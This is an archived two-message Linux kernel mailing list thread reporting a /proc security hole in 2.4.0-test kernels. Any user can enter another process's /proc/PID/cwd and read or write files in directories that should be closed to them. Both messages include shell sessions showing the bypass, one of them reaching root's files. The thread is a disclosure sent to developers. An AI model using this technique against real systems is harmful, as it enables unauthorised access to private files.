* 2.4.(0-test10): /proc security hole
@ 2000-11-05 13:02 Lutz Pressler
2000-11-06 0:29 ` Jan Dvorak
0 siblings, 1 reply; 2+ messages in thread
From: Lutz Pressler @ 2000-11-05 13:02 UTC (permalink / raw)
To: linux-kernel
Hello,
I do not think that the following behaviour (2.4.0-test10 on i386, also
tested with 2.4.0-test8) is intended:
testuser@vax:~ > id
uid=503(testuser) gid=100(users) Gruppen=100(users)
testuser@vax:~ > ls -lad .
drwx------ 7 testuser users 4096 Nov 5 13:38 .
testuser@vax:~ > cd dir
testuser@vax:~/dir > ls -la
insgesamt 16
drwxr-xr-x 3 testuser users 4096 Nov 5 13:39 .
drwx------ 7 testuser users 4096 Nov 5 13:38 ..
-rw-r--r-- 1 testuser users 7 Nov 5 13:39 file
drwxrwxr-x 2 testuser users 4096 Nov 5 13:39 subdir
Myself (lpressl, uid=500) cannot change into /home/testuser/dir,
as expected:
lpressl@vax:~ > cd ~testuser/dir
bash: cd: /home/testuser/dir: Permission denied
BUT: let testuser be logged in and have a process (bash) with cwd
/home/testuser/dir. Then
lpressl@vax:~ > ps uax |grep testuser
yields
...
testuser 588 0.0 2.1 2256 1360 tty2 S 13:38 0:00 -bash
...
lpressl@vax:~ > cd /proc/588
lpressl@vax:/proc/588 > ls -la
total 0
dr-xr-xr-x 3 testuser users 0 Nov 5 13:49 .
dr-xr-xr-x 59 root root 0 Nov 5 13:34 ..
-r--r--r-- 1 testuser users 0 Nov 5 13:49 cmdline
lrwxrwxrwx 1 testuser users 0 Nov 5 13:49 cwd -> /home/testuser/dir
-r-------- 1 testuser users 0 Nov 5 13:49 environ
lrwxrwxrwx 1 testuser users 0 Nov 5 13:49 exe -> /bin/bash
dr-x------ 2 testuser users 0 Nov 5 13:49 fd
-r--r--r-- 1 testuser users 0 Nov 5 13:49 maps
-rw------- 1 testuser users 0 Nov 5 13:49 mem
lrwxrwxrwx 1 testuser users 0 Nov 5 13:49 root -> /
-r--r--r-- 1 testuser users 0 Nov 5 13:49 stat
-r--r--r-- 1 testuser users 0 Nov 5 13:49 statm
-r--r--r-- 1 testuser users 0 Nov 5 13:49 status
cd cwd shouldn't be possible, should it? But let's see:
lpressl@vax:/proc/588 > cd cwd
lpressl@vax:/proc/588/cwd >
Oops....
lpressl@vax:/proc/588/cwd > ls -la
total 16
drwxr-xr-x 3 testuser users 4096 Nov 5 13:39 .
drwx------ 7 testuser users 4096 Nov 5 13:38 ..
-rw-r--r-- 1 testuser users 7 Nov 5 13:39 file
drwxrwxr-x 2 testuser users 4096 Nov 5 13:39 subdir
lpressl@vax:/proc/588/cwd > cat file
secret
lpressl@vax:/proc/588/cwd > cd subdir
lpressl@vax:/proc/588/cwd/subdir >
lpressl@vax:/proc/588/cwd/subdir > echo ohoh > newfile
lpressl@vax:/proc/588/cwd/subdir > ls -la
total 12
drwxrwxr-x 2 testuser users 4096 Nov 5 13:53 .
drwxr-xr-x 3 testuser users 4096 Nov 5 13:39 ..
-rw-r--r-- 1 lpressl users 5 Nov 5 13:53 newfile
This is bad. 2.2 kernels don't show this behavior. There _any_
/proc/PID/cwd "directory" has no group or world permissions
at all.
I haven't looked at the code at all yet. Anybody with a fix?
Regards,
Lutz
--
_ | Lutz Pressler | Tel: ++49-551-3700002
|_ |\ | | Service Network GmbH | FAX: ++49-551-3700009
._|ER | \|ET | Bahnhofsallee 1b | mailto:lp@SerNet.DE
Service Network | D-37081 Goettingen | http://www.SerNet.DE/
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
Please read the FAQ at http://www.tux.org/lkml/
^ permalink raw reply [flat|nested] 2+ messages in thread
* Re: 2.4.(0-test10): /proc security hole
2000-11-05 13:02 2.4.(0-test10): /proc security hole Lutz Pressler
@ 2000-11-06 0:29 ` Jan Dvorak
0 siblings, 0 replies; 2+ messages in thread
From: Jan Dvorak @ 2000-11-06 0:29 UTC (permalink / raw)
To: Lutz Pressler; +Cc: linux-kernel
On Sun, Nov 05, 2000 at 01:02:14PM +0000, Lutz Pressler wrote:
> Hello,
>
> I do not think that the following behaviour (2.4.0-test10 on i386, also
> tested with 2.4.0-test8) is intended:
>
..
> This is bad. 2.2 kernels don't show this behavior. There _any_
> /proc/PID/cwd "directory" has no group or world permissions
> at all.
>
> I haven't looked at the code at all yet. Anybody with a fix?
I wonder that noone rospond. I can confirm this - in 2.2.x links to cwd,
exe etc. pointed to nowhere (readlink failed) when there was insufficient
privileges to enter the dir. In 2.4.x the links blindly points to directory
setting all its privileges for access by /proc. Because everyone has dirs
drwxr-xr-x in his home, such dirs now become accesible through /proc if user
is in them. This is real security leak.
ex:
[johnydog@napalm 210]$ whoami
johnydog
[johnydog@napalm 210]$ pwd
/proc/210
[johnydog@napalm 210]$ ls -l ./cwd
lrwxrwxrwx 1 root root 0 Nov 6 01:26 ./cwd -> /root/.mc
[johnydog@napalm 210]$ cd /root/.mc
bash: /root/.mc: Permission denied
[johnydog@napalm 210]$ cd cwd
[johnydog@napalm cwd]$ ls -l
total 53
-rw-r--r-- 1 root root 35 Nov 6 01:16 Tree
-rw-r--r-- 1 root root 13203 May 31 11:54 ext
-rw------- 1 root root 15952 Nov 6 01:16 history
-rw------- 1 root root 20 May 6 1998 hotlist
-rw-r--r-- 1 root root 6417 Nov 6 01:16 ini
drwx------ 2 root root 3072 Nov 6 01:16 tmp
-rw-r--r-- 1 root root 10121 Jun 30 17:04 tree
[johnydog@napalm cwd]$
Jan Dvorak <johnydog@go.cz>
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
Please read the FAQ at http://www.tux.org/lkml/
^ permalink raw reply [flat|nested] 2+ messages in thread
end of thread, other threads:[~2000-11-06 0:30 UTC | newest]
Thread overview: 2+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2000-11-05 13:02 2.4.(0-test10): /proc security hole Lutz Pressler
2000-11-06 0:29 ` Jan Dvorak
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.